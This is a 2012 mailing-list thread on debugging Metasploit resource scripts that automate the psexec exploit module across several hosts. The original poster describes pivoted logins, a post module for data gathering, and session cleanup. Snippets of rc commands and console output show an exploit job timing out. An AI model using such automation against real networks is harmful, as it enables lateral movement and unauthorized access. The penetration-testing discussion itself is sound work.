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Re: Catching exploit exceptions in rc script

From: Joshua Smith <lazydj98 () gmail com>
Date: Tue, 26 Jun 2012 12:54:03 -0500

birchfresh and I were direct emailing, thought I would send this to the list:  
this works:

        run_single("use exploit/windows/smb/psexec")
        run_single("set RHOST") # <-- this host doesn't exist
                run_single("exploit -j")

[*] resource (/msf/test.rc)> Ruby Code (126 bytes)
[*] Exploit running as background job.

[*] Started reverse handler on 
[*] Connecting to the server...

<a while later>
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (
URule exploit(psexec) > jobs


No active jobs.

URule exploit(psexec) >

Something else to keep in mind, inside a ruby block (in an rc file) you're in a weird place in the framework 
cat test.rc
        puts self.class
resource test.rc
[*] Processing /msf/test.rc for ERB directives.
[*] resource (/msf/test.rc)> Ruby Code (17 bytes)


On Jun 26, 2012, at 10:46 AM, birchfresh wrote:

Hello there.

I'm using msfconsole (newest git) to run a rc script that's essentially
something like:

 run_single("use windows/smb/psexec")
 # [...]

 old_sessions = framework.sessions.keys.clone
 run_single("exploit -z") rescue nil    # script stops here after exception!

 new_session = (old_sessions - framework.sessions.keys).first
 do_something_with(new_session) if new_session

My problem is that if the exploit raises an exception, the script refuses
continue until I press ^C. Shouldn't "rescue nil" catch the exception?

I tried to work around it by running the exploit as a background job
(exploit -z -j) and waiting for to be decremented,
but it's no good: If there's an exception, the job hangs around forever.

For context, I'm doing the following to a number of hosts, one by one:
Pivoted login with the psexec module, run a post module to gather some
data, kill the session, move on to the next host.

Is there a better way to open a session (and get its number) than to
run_single("exploit -z") and poke around in framework.sessions.keys for

Or, as a last resort: Is there a way to tell if the exploit at[id] is dead?


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